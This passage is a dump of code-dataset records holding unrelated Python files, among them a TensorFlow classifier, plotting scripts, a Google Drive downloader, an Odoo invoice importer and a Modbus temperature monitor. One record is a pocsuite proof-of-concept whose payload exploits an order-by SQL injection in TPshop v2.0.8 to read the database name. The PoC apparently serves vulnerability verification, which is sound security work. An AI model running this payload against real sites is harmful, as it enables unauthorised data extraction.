\"import task_1\" \"task_1.amax3(500)\"\n# 1000 loops, best of 5: 808 usec per loop\n\n\n","sub_path":"Python_algorithm_4/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":5653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619220639","text":"import sklearn as skl\nimport tensorflow as tf\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ndef load_data():\n dataset = pd.read_csv('data.csv', usecols=['combined_shot_type', 'seconds_remaining', 'shot_distance',\n 'playoffs', 'shot_zone_range', 'shot_zone_area', 'shot_made_flag'])\n return dataset\n\n\ndef convert2onehot(d2onehot):\n # covert data to onehot representation\n return pd.get_dummies(d2onehot)\n\n\n# data_df = load_data().dropna()\n# data_df['shot_fail_flag'] = 1-data_df.loc[:, 'shot_made_flag']\n# # print(data_df.head(5))\n# data = convert2onehot(data_df)\n# print('Onehot data:\\n', data[:5])\n# print(\"Num of data:\\n \", data.shape, \"\\n\")\n# for name in data_df.keys():\n# print(name, pd.unique(data_df[name]))\n\n# Preprocessing & separate training sets\nx_ = np.load('../data/soil_pca_plant_3600x88.npy')\ny_ = np.load('../data/label.npy')[:3600]\ny_ = convert2onehot(y_)\nprint('x:', x_.shape)\nprint('y:', y_.shape)\n\nshuffle = np.hstack((y_, x_)).copy()\n# print('before shuffle:', b4shuffle)\nnp.random.shuffle(shuffle) # shuffle\n# print('after shuffle:', b4shuffle.shape)\n# print(b4shuffle)\n# 4: Separate\nsep = int(0.3 * len(x_))\ntrain_x = shuffle[:sep, 4:].copy()\ntrain_y = shuffle[:sep, 0:4].copy()\ntest_x = shuffle[sep:, 4:].copy()\ntest_y = shuffle[sep:, 0:4].copy()\n\n# x_combined = np.vstack((train_x, test_x))\n# y_combined = np.vstack((train_y, test_y))\n# print(train_x[:15])\n# print(train_y[:15])\n\n\n# build network\nwith tf.variable_scope('Inputs'):\n tfx = tf.placeholder(tf.float32, [None, 82], 'Input_x')\n tfy = tf.placeholder(tf.float32, [None, 4], 'Input_y')\n\nprint('tfx shape', tfx.shape)\n\nwith tf.variable_scope('Layers'):\n l1 = tf.layers.dense(tfx, 256, tf.nn.relu, name=\"L1\") # 全连接层\n l2 = tf.layers.dense(tfx, 256, tf.nn.tanh, name=\"L2\")\n # l3 = tf.layers.dense(l2, 128, tf.nn.relu, name=\"L3\")\n # l4 = tf.layers.dense(l3, 64, tf.nn.relu, name=\"L4\")\n out = tf.layers.dense(l2, 4, tf.nn.relu, name=\"L5\")\n\nprediction = tf.nn.softmax(out, name=\"Prediction\")\n\nloss = tf.losses.softmax_cross_entropy(onehot_labels=tfy, logits=out, scope='loss')\naccuracy = tf.metrics.accuracy( # return (acc, update_op), and create 2 local variables\n labels=tf.argmax(tfy, axis=1), predictions=tf.argmax(out, axis=1),)[1]\noptima = tf.train.AdadeltaOptimizer(learning_rate=0.05)\ntrain_optima = optima.minimize(loss)\ntf.summary.scalar('Loss', loss)\n\nsess = tf.Session()\nsess.run(tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())) # accuracy is in local variable init\nwriter = tf.summary.FileWriter(\"/Users/Epilo/Documents/CodeTest/py_BigData\", sess.graph)\n\n# training\nplt.ion()\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(8, 4))\naccuracies, steps = [], []\nfor t in range(5000):\n # training\n sess.run(train_optima, feed_dict={tfx: train_x, tfy: train_y})\n\n if t % 50 == 0:\n # testing\n acc_, pred_, loss_ = sess.run([accuracy, prediction, loss], {tfx: test_x, tfy: test_y})\n accuracies.append(acc_)\n steps.append(t)\n # print(acc_.__class__)\n print(\"Step: %i\" % t, \"| ACC: %.6f\" % acc_, \"| Loss: %.6f\" % (loss_*10000))\n\n # visualize testing\n # ax1.cla()\n # for c in range(3):\n # bp = ax1.bar(c+0.1, height=sum((np.argmax(pred_, axis=1) == c)),\n # width=0.2, color='red')\n # bt = ax1.bar(c-0.1, height=sum((np.argmax(test_y, axis=1) == c)),\n # width=0.2, color='blue')\n # ax1.set_xticks(range(2), ['success', 'failure'])\n # ax1.legend(handles=[bp, bt], labels=[\"prediction\", \"target\"])\n # ax1.set_ylim((0, 20000))\n # ax2.cla()\n # ax2.plot(steps, accuracies, label=\"accuracy\")\n # ax2.set_ylim(ymax=0.8)\n # ax2.set_ylabel(\"accuracy\")\n # plt.pause(0.01)\n#\n# plt.ioff()\n# plt.show()\n\nprint(1)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"116787332","text":"#!/usr/bin/python\n\nimport numpy, matplotlib, matplotlib.colors, matplotlib.pyplot, gzip\nimport matplotlib.gridspec\nimport matplotlib.patches as patches\n\nimport sys\n\ndef anint(x):\n x1=numpy.floor(x)\n x2=x1+1.0\n if (x2-x)<(x-x1):\n return int(x2)\n else:\n return int(x1)\n\n## regions for SS types\nphi_alpha_1=-122\nphi_alpha_2=-52\npsi_alpha_1=-84\npsi_alpha_2=-14\n#edit to accomodate more residues eg. 16-22 = 6\n#rama=numpy.zeros((6,360,360))\nrama=numpy.zeros((39,360,360))\n\ninf=open(sys.argv[1],'r')\nnRes=int(sys.argv[3])\nnPB=nRes-2\n\nwhile 1:\n line=inf.readline()\n #print line\n if line[0]=='@':\n continue\n if line[0]=='#':\n continue\n break\n\nnorm=0\nfinished=False\nwhile 1:\n #print norm\n for ires in range(nPB):\n line=inf.readline()[:-1]\n if line=='':\n \tfinished=True\n \tbreak\n if len(line)==0:\n \tfinished=True\n \tbreak\n norm+=1\n data=line.split()\n if len(data)<2:\n \tfinished=True\n \tbreak\n (phi,psi)=(float(data[0]),float(data[1]))\n iPhi=anint(phi)+180\n if iPhi==360:\n iPhi=0\n iPsi=anint(psi)+180\n if iPsi==360:\n iPsi=0\n rama[ires,iPsi,iPhi]+=1.0\n if finished:\n \tbreak\n\nfor ires in range(nPB):\n## normalise\n fig=matplotlib.pyplot.figure(figsize=(10,8))\n cs=matplotlib.pyplot.contourf([float(iPsi) for iPsi in range(-180,180)],[float(iPhi) for iPhi in range(-180,180)],rama[ires,:,:]\n ,[0,10,20,30,40,50,60],extend='both')\n ca=matplotlib.pyplot.gca()\n ca.add_patch(patches.Rectangle((-122,-84),70,70,fill=False))\n ca.add_patch(patches.Rectangle((-150,95),80,80,fill=False))\n ca.add_patch(patches.Rectangle((14,52),70,70,fill=False))\n ca.add_patch(patches.Rectangle((-180,50),130,130,fill=False))\n ca.add_patch(patches.Rectangle((150,50),30,130,fill=False))\n ca.add_patch(patches.Rectangle((-180,-180),130,30,fill=False))\n cb=matplotlib.pyplot.colorbar()\n\n font = {'family': 'serif',\n 'color': 'darkred',\n 'size': 24,\n }\n\n #matplotlib.pyplot.title('Abeta16-22 in AWI', fontdict=font)\n matplotlib.pyplot.xlabel('Phi',fontdict=font)\n matplotlib.pyplot.xticks([-180,-90,0,90,180],['-180','-90','0','90','180'],size=16)\n matplotlib.pyplot.ylabel('Psi',fontdict=font)\n matplotlib.pyplot.yticks([-180,-90,0,90,180],['-180','-90','0','90','180'],size=16)\n\n#cb=matplotlib.pyplot.colorbar()\n savefile=sys.argv[2] + str(ires)\n fig.savefig(savefile)\n #fig.show()\n","sub_path":"rama/plot_rama-residue.py","file_name":"plot_rama-residue.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"378833655","text":"import struct\nfrom pymnl.message import NLMSG_MIN_TYPE, NLMSG_ALIGN\n\nfrom socket import (\n IPPROTO_TCP,\n IPPROTO_UDP,\n IPPROTO_ICMP,\n IPPROTO_ICMPV6\n)\n\nIPPROTO_DCCP = 33 # Datagram Congestion Control Protocol\nIPPROTO_GRE = 47 # Cisco GRE tunnels (rfc 1701,1702)\nIPPROTO_SCTP = 132 # Stream Control Transport Protocol\nIPPROTO_UDPLITE = 136 # UDP-Lite (RFC 3828)\n\n# General form of address family dependent message.\nNFNL_HDRFMT = 'BBH'\nNFNL_HDRLEN = NLMSG_ALIGN(struct.calcsize(NFNL_HDRFMT))\n\n# Reserved control nfnetlink messages\nNFNL_MSG_BATCH_BEGIN = NLMSG_MIN_TYPE\nNFNL_MSG_BATCH_END = NLMSG_MIN_TYPE + 1\n\n# nfnetlink_groups\nNFNLGRP_NONE = 0x0\nNFNLGRP_CONNTRACK_NEW = 0x1\nNFNLGRP_CONNTRACK_UPDATE = 0x2\nNFNLGRP_CONNTRACK_DESTROY = 0x3\nNFNLGRP_CONNTRACK_EXP_NEW = 0x4\nNFNLGRP_CONNTRACK_EXP_UPDATE = 0x5\nNFNLGRP_CONNTRACK_EXP_DESTROY = 0x6\nNFNLGRP_NFTABLES = 0x7\n\nNFNL_SUBSYS_NONE = 0\nNFNL_SUBSYS_CTNETLINK = 1\nNFNL_SUBSYS_CTNETLINK_EXP = 2\nNFNL_SUBSYS_QUEUE = 3\nNFNL_SUBSYS_ULOG = 4\nNFNL_SUBSYS_OSF = 5\nNFNL_SUBSYS_IPSET = 6\nNFNL_SUBSYS_ACCT = 7\nNFNL_SUBSYS_CTNETLINK_TIMEOUT = 8\nNFNL_SUBSYS_CTHELPER = 9\nNFNL_SUBSYS_NFTABLES = 10\nNFNL_SUBSYS_NFT_COMPAT = 11\nNFNL_SUBSYS_COUNT = 12\n\nNF_NETLINK_CONNTRACK_NEW = 0x00000001\nNF_NETLINK_CONNTRACK_UPDATE = 0x00000002\nNF_NETLINK_CONNTRACK_DESTROY = 0x00000004\nNF_NETLINK_CONNTRACK_EXP_NEW = 0x00000008\nNF_NETLINK_CONNTRACK_EXP_UPDATE = 0x00000010\nNF_NETLINK_CONNTRACK_EXP_DESTROY = 0x00000020\n\nNFNETLINK_V0 = 0\n\n# netfilter netlink message types are split in two pieces: 8 bit subsystem, 8bit operation.\ndef NFNL_SUBSYS_ID(x):\n return ((x & 0xff00) >> 8)\n\ndef NFNL_MSG_TYPE(x):\n return (x & 0x00ff)","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"376694926","text":"\n\n#calss header\nclass _HERALD():\n\tdef __init__(self,): \n\t\tself.name = \"HERALD\"\n\t\tself.definitions = [u'a sign that something will happen, change, etc.: ', u'in the past, a person who carried important messages and made announcements']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_herald.py","file_name":"_herald.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"42758029","text":"#This module downloads files from a shared google drive folder\n\n# !/usr/bin/python\nfrom __future__ import print_function\n\nimport os\n#import os.path\nimport re\nimport shutil\nimport sys\nimport tempfile\nimport requests\nimport six\nimport tqdm\n\n\ndef download_file_from_google_drive(id, destination, URL):\n session = requests.Session()\n response = session.get(URL, params = { 'id' : id }, stream = True)\n token = get_confirm_token(response)\n\n if token:\n params = { 'id' : id, 'confirm' : token }\n response = session.get(URL, params = params, stream = True)\n \n #if not os.path.isfile(destination):\n save_response_content(response, destination) \n\ndef get_confirm_token(response):\n for key, value in response.cookies.items():\n if key.startswith('download_warning'):\n return value\n\n return None\n\ndef save_response_content(response, destination):\n CHUNK_SIZE = 32768\n\n with open(destination, \"wb\") as f:\n for chunk in response.iter_content(CHUNK_SIZE):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n \n \ndef check_nature(destination):\n myFile=open(destination)\n contents=myFile.read()\n myFile.close()\n for i,line in enumerate(contents.splitlines()):\n i=i+1\n if i> 9:\n return False\n return True\n \ndef is_drive_folder(source):\n statinfo = os.stat(source)\n if statinfo.st_size > 141:\n return False\n return True\n \ndef id_extractor(source,id_list):\n myFile=open(source, \"r\")\n contents=myFile.read()\n myFile.close() \n lines=contents.splitlines() \n for line in lines:\n #iterate for each found item\n for m in re.finditer(r\"\\\\x5b\\\\x22\", line): #look for a pattern that comes before the id of the url \n #get the id of the item\n item_id=line[m.end():m.end()+33]\n #get the name of the item\n n=re.search(r\"\\\\x22\\\\x5d\\\\n,\\\\x22\", line[m.end():]) \n if n!= None:\n o=re.search(r\"\\\\x22,\\\\x22\", line[m.end()+n.end():])\n if o!= None:\n item_name=line[m.end()+n.end():m.end()+n.end()+o.start()] \n flag=False\n for iterator in id_list:\n if item_name in iterator:\n flag=True\n if not flag:\n id_list.append([item_name,item_id])\n \nif __name__ == '__main__':\n if len(sys.argv) < 2: \n item_id=input(\"The id for the main folder ?\")\n elif(sys.argv) == 2: \n item_id=sys.argv[1] \n else: \n #sortie avec code d'erreur different de 0\n item_id='' #one needs to select drive folder ID Here\n sys.exit(10)\n \n count=0\n liste=[]\n identifiers=[]\n # create the session\n session = requests.Session()\n #set the first item which is url for the base folder\n if not os.path.isfile(\"dat.txt\"):\n myFile= open(\"dat.txt\",\"w+\")\n myFile.write(\"%s;/;\"% \"base folder.temp\")\n myFile.write(\"%s\\n\"% item_id)\n myFile.close() \n \n myFile= open(\"dat.txt\",\"r\")\n content=myFile.read()\n myFile.close()\n \n lines=content.splitlines() \n for line in lines:\n item=line.split(\";/;\")\n liste.append(item)\n \n while count < len(liste): \n item_id=liste[count][1] \n destination=liste[count][0]\n #set the link type then dowload the file/folder\n URL = 'https://docs.google.com/uc?export=download' # or \"https://drive.google.com/uc?export=download\" to download\n \t\n print('Downloading file',destination)\n download_file_from_google_drive(item_id, destination, URL)\n \n if is_drive_folder(destination):\n URL = 'https://drive.google.com/open?' \n download_file_from_google_drive(item_id, destination, URL)\n \n id_extractor(destination,liste)\n os.remove(destination)\n print(\"File \",destination,\" Removed!\") \n destination = liste[count][0] #'image'+str(count)+'.jpg' \n count=count+1 \n f= open(\"dat.txt\",\"w+\")\n for element in liste:\n f.write(\"%s;/;\"% element[0])\n f.write(\"%s\\n\"% element[1])\n f.close() \n\n","sub_path":"file_download_using_requests.py","file_name":"file_download_using_requests.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"427435454","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport string\nimport random\nimport time\nimport re\nfrom pocsuite.net import req\nfrom pocsuite.poc import POCBase, Output\nfrom pocsuite.utils import register\n\n\nclass TestPOC(POCBase):\n name = 'TPshopv2.0.8 sql injection Vulnerability'\n vulID = '0'\n author = ['cws6']\n vulType = 'sql-inj'\n version = '1'\n references = ['https://www.bodkin.ren/index.php/archives/244/']\n desc = '''tpshopv2.0.8 /application/home/controller/Goods.php存在order by sql注入'''\n\n vulDate = '2018-01-27'\n createDate = '2019-04-16'\n updateDate = '2019-04-16'\n\n appName = 'TPshop'\n appVersion = 'v2.0.8'\n appPowerLink = 'http://www.tp-shop.cn'\n samples = ['re']\n\n \n def _attack(self):\n \"\"\"attack mode\"\"\"\n result = {}\n payload1 = '/index.php/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(select count(*) from information_schema.columns group by concat(0x7e,(select database()),0x7e,floor(rand()*2)))' \n while True:\n resp = req.get(self.url + payload1)\n dbname1 = re.findall(\"~(.*?)~\", resp.content)\n time.sleep(2)\n if dbname1:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n result['Database'] = {}\n result['Database']['DBname'] = dbname1[0]\n break\n return self.parse_output(result)\n\n def _verify(self):\n \"\"\"verify mode\"\"\"\n result = {}\n payload1 = '/index.php/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(select count(*) from information_schema.columns group by concat(0x7e,1,0x7e,floor(rand()*2)))' \n while True:\n resp = req.get(self.url + payload1)\n dbname1 = re.findall(\"~(.*?)~\", resp.content)\n time.sleep(2)\n if dbname1:\n result['VerifyInfo'] = {}\n result['VerifyInfo']['URL'] = self.url\n break\n\n return self.parse_output(result)\n\n def parse_output(self, result):\n output = Output(self)\n if result:\n output.success(result)\n else:\n output.fail('Internet nothing returned')\n return output\n\n\nregister(TestPOC)\n\n","sub_path":"tpshop/tpshopv2.0.8.SQL_Injection_Vulnerability.py","file_name":"tpshopv2.0.8.SQL_Injection_Vulnerability.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"186374651","text":"# -*- coding: utf-8 -*-\nfrom StringIO import StringIO\nfrom datetime import datetime, date\nfrom odoo import api, fields, models\nimport base64\n\n\nclass TxtImport(models.TransientModel):\n _name = 'txt.import'\n _description = u\"Upload mora Txt \"\n\n #txt = fields.Many2many('ir.attachment', string=u'Cargar .txt', )\n fichero = fields.Binary(u'Archivo CREP')\n\n\n\n @api.multi\n def procesar_txt(self):\n data = []\n fichero = base64.decodestring(self.fichero)\n io = StringIO(fichero)\n\n i = 0\n while i < 2:\n linea = io.readline()\n if linea == '':\n i = i + 1\n else:\n if linea.find('EFECTIVO') == -1:\n pass\n else:\n line = linea.split()\n inquilino = line[1][8:]\n if inquilino != '':\n monto = line[2].replace('\"', '')\n inquilino = inquilino\n else:\n inquilino = line[2]\n monto = line[3]\n valores = {'referencia': inquilino, 'monto': monto}\n data.append(valores)\n\n for datos in data:\n self.crear_boleta_mora(datos)\n #if datos['referencia'] == 'GM07263007D04K' :\n\n\n\n @api.multi\n def crear_boleta_mora(self, data):\n if data:\n # suscripcion = self.env['sale.subscription'].search([('code', '=', data['referencia'])])\n # cliente_id = suscripcion.partner_id.id\n referencia = data['referencia']\n #ref2 = referencia.replace(\"'\",\"\" )\n facturas = self.env['account.invoice'].search([('origin', 'ilike', referencia),('state', '=','open')])\n #facturas2 = self.env['account.invoice'].search([\n # ('origin', '=', ref2)])\n if facturas:\n monto_total = 0.0\n for factura in facturas:\n monto_total = monto_total + factura.amount_total\n # generamos\n self.generar_boleta(factura, data['monto'], monto_total)\n #boleta_id = self.generar_boleta(factura,boleta_id, data['monto'], monto_total).get('boleta_id')\n #view_id = self.env.ref('biosis_facturacion.biosis_facturacion_boleta_mora_tree').id\n # return {\n # 'name': u'Boleta sujeta a mora',\n # 'type': 'ir.actions.act_window',\n # 'view_type': 'tree',\n # 'view_mode': 'tree',\n # 'target': 'current',\n # 'res_model': 'account.invoice',\n # 'res_id': boleta_id,\n # 'view_id': view_id,\n #\n # }\n\n # mostramos el formulario nada mas\n # view_id = self.env.ref('biosis_facturacion.biosis_facturacion_boleta_mora_form').id\n # return {\n # 'name': u'Boleta Mora',\n # 'type': 'ir.actions.act_window',\n # 'view_type': 'form',\n # 'view_mode': 'form',\n # 'target': 'current',\n # 'res_model': 'account.invoice',\n # 'res_id': boleta_id,\n # 'view_id': view_id,\n #\n # }\n\n\n\n\n @api.multi\n def generar_boleta(self, invoice, monto_txt, monto_total):\n conteo = 0\n # for invoice in self:\n boleta_id = self.env['einvoice.catalog.01'].search([('code', '=', '03')]).id\n\n boleta_vals = {\n #'invoice_id': invoice.id,\n 'date_invoice': datetime.now().strftime('%Y-%m-%d'),\n 'account_id': invoice.account_id.id,\n 'tipo_operacion': invoice.tipo_operacion,\n 'partner_id': invoice.partner_id.id,\n 'tipo_comprobante_id': boleta_id,\n 'state': 'draft',\n 'currency_id': invoice.currency_id.id,\n 'is_boleta_mora': True\n }\n #boleta = self.env['account.invoice'].create(boleta_vals)\n fact = self.env['account.invoice'].create(boleta_vals)\n # Copiar lineas de factura.\n\n line2 = {}\n for line in invoice.invoice_line_ids:\n line2 = line.copy()\n monto = monto_txt.replace(',','')\n line2.price_unit = float(monto) - monto_total\n line2.write({'invoice_id': fact.id})\n\n return fact\n\n","sub_path":"biosis_moras/models/account_invoice_import_txt.py","file_name":"account_invoice_import_txt.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503910203","text":"def Prim(n,w,cost):\r\n mincost = [float('inf')]*n\r\n used = [False]*n\r\n mincost[0] = 0\r\n res = 0\r\n \r\n while True:\r\n v = -1\r\n for i in range(n):\r\n if (not used[i]) and (v==-1 or mincost[i] < mincost[v]):\r\n v = i\r\n if v == -1:\r\n break\r\n used[v] = True\r\n res += mincost[v]\r\n for i in range(n):\r\n mincost[i] = min(mincost[i], cost[v][i])\r\n return res\r\n\r\ndef Prim_heap():\r\n import heapq\r\n used = [True]*n\r\n edgelist = []\r\n for e in edge[0]:\r\n heapq.heappush(edgelist, e)\r\n used[0] = False\r\n res = 0\r\n while len(edgelist) != 0:\r\n minedge = heapq.heappop(edgelist)\r\n if not used[minedge[1]]:\r\n continue\r\n v = minedge[1]\r\n used[v] = False\r\n for e in edge[v]:\r\n if used[e[1]]:\r\n heapq.heappush(edgelist, e)\r\n res += minedge[0]\r\n return res\r\nn,w = map(int,input().split())\r\nedge = [[] for i in range(n)]\r\n#隣接リスト edge[i]:[コスト,行先]\r\nfor i in range(w):\r\n x,y,z = map(int,input().split())\r\n edge[x].append([z,y])\r\n edge[y].append([z,x])\r\nprint(prim_heap())","sub_path":"libraries/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"411798415","text":"from pyModbusTCP.client import ModbusClient\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import *\nimport tkinter\nimport datetime as dt\nimport pandas as pd\nimport pymongo\nimport plotly.express as px\nimport numpy as np\n\nstart_regs = 120\nsensor_no = ModbusClient(host=\"192.40.50.107\", port=10010, unit_id=1, auto_open=True)\nsensor_no.open()\nregs = sensor_no.read_holding_registers(0, start_regs)\nif regs:\n print(regs)\nelse:\n print(\"read error\")\n\nfor n in range(start_regs // 2):\n data_count = n * 2\n regs[data_count], regs[data_count + 1] = regs[data_count + 1], regs[data_count]\n\ndec_array = regs\n\ndata_bytes = np.array(dec_array, dtype=np.uint16)\ndata_as_float = data_bytes.view(dtype=np.float32)\n\ntime_data = dt.datetime.now().strftime('%Y-%m-%d %X')\n\nstart = 1\nstart_range = start_regs // 2\n\nvalue = [[num for num in range(start, start + start_range)],\n [num for num in range(start, start + start_range)],\n data_as_float]\n\ndata = np.array(value).T.tolist()\n\nproducts = data\narr = []\nfor product in products:\n vals = {}\n vals[\"Sensor No\"] = str(int(product[1]))\n vals[\"Temp\"] = str(round(product[2], 4))\n vals[\"Time\"] = str(time_data)\n arr.append(vals)\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\nmydb = myclient[\"Modbus_Database\"]\n\nmycol = mydb[\"collection1\"]\n\nrecord_data = arr\nmycol.insert_many(record_data)\n\ndocuments = list(mycol.find({}, {'_id': 0}))\nres = [list(idx.values()) for idx in documents]\n\nfor index1, row in enumerate(res):\n for index2, item in enumerate(row):\n try:\n res[index1][index2] = (float(item))\n except ValueError:\n pass\n\n\nclass ModbusOop(object):\n def __init__(self):\n self.root = tk.Tk()\n self.style = ttk.Style()\n self.style.map(\"Treeview\", foreground=self.fixed_map(\"foreground\"), background=self.fixed_map(\"background\"))\n self.tree = ttk.Treeview(self.root)\n self.canvas = tk.Canvas(self.root, width=1580, height=600)\n\n def fixed_map(self, option):\n return [elm for elm in self.style.map(\"Treeview\", query_opt=option) if elm[:2] != (\"!disabled\", \"!selected\")]\n\n def on_double_click(self, event):\n item = self.tree.identify('item', event.x, event.y)\n\n print(self.tree.item(item, \"text\"))\n\n xs_doc = list(\n mycol.find(\n {\"$and\": [{\"Sensor No\": self.tree.item(item, \"text\")},\n {\"Time\": {\"$gte\": \"2021-05-31 13:14:58\",\n \"$lt\": dt.datetime.now().strftime('%Y-%m-%d %X')}}]},\n {'_id': 0}))\n\n xs_res = [list(idx.values()) for idx in xs_doc]\n\n df = pd.DataFrame(list(xs_doc))\n df['Temp'] = df['Temp'].astype(np.float64)\n\n for index1, row in enumerate(xs_res):\n for index2, item in enumerate(row):\n try:\n xs_res[index1][index2] = (float(item))\n except ValueError:\n pass\n df = pd.DataFrame(xs_doc)\n df['Temp'] = df['Temp'].astype(np.float64)\n fig = px.line(df, x='Time', y='Temp', title='Temperature °C - Time', color='Sensor No')\n\n fig.update_xaxes(\n rangeselector=dict(\n buttons=list([\n dict(count=1, label=\"1m\", step=\"month\", stepmode=\"backward\"),\n dict(count=3, label=\"3m\", step=\"month\", stepmode=\"backward\"),\n dict(count=6, label=\"6m\", step=\"month\", stepmode=\"todate\"),\n dict(count=1, label=\"1y\", step=\"year\", stepmode=\"backward\"),\n dict(step=\"all\")\n ])\n )\n )\n\n return fig.show()\n\n def _quit(event):\n sys.exit()\n\n def window_table(self):\n\n self.root.title(\"Sensor's Temperatures °C\")\n self.root.geometry(\"480x630\")\n self.root.grid()\n\n p1 = PhotoImage(file='images1.png')\n self.root.iconphoto(False, p1)\n\n self.tree.pack(side='top', fill=tkinter.BOTH, expand=True)\n\n verscrlbar = ttk.Scrollbar(self.root,\n orient=\"vertical\",\n command=self.tree.yview)\n\n self.tree.configure(xscrollcommand=verscrlbar.set)\n\n self.tree[\"columns\"] = (\"1\", \"2\", \"3\")\n\n self.tree['show'] = 'headings'\n\n self.tree.column(\"1\", width=125, minwidth=30, anchor='c')\n self.tree.column(\"2\", width=65, minwidth=30, anchor='c')\n self.tree.column(\"3\", width=115, minwidth=30, anchor='c')\n\n self.tree.heading(\"1\", text=\"Time\")\n self.tree.heading(\"2\", text=\"Sensor No\")\n self.tree.heading(\"3\", text=\"Temperature °C\")\n\n self.tree.bind(\"\", self.on_double_click)\n\n self.canvas.create_rectangle(10, 150, 1580, 170, fill='grey', outline='white', tag='rect1')\n self.canvas.create_rectangle(10, 500, 1580, 520, fill='grey', outline='white', tag='rect2')\n self.canvas.create_rectangle(365, 170, 385, 500, fill='grey', outline='white', tag='rect3')\n\n start3 = 45\n n = 1\n for z in range(26):\n self.canvas.create_text(start3, 140, text=n)\n self.canvas.create_text(start3, 530, text=n + 34)\n start3 += 60\n n += 1\n\n start4 = 195\n f = 27\n for t in range(8):\n self.canvas.create_text(395, start4, text=f)\n start4 += 40\n f += 1\n\n start_range = 0\n id_count = 1\n start = 40\n\n self.tree.tag_configure('high', foreground='red')\n self.tree.tag_configure('low', foreground='black')\n\n for record in res[-(start_regs // 2):]:\n sensor_id = record[0]\n temperature = record[1]\n date_time = record[2]\n if float(temperature) > 30.0:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('high',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 25.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n else:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('low',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n start_range += 1\n id_count += 1\n\n menu = Menu(self.root)\n self.root.config(menu=menu)\n menu.add_cascade(label='Quit', command=self._quit)\n\n self.tree.after(60000, self.update_window_table)\n self.canvas.pack()\n return self.root.mainloop()\n\n def update_window_table(self):\n\n start_range = 0\n id_count 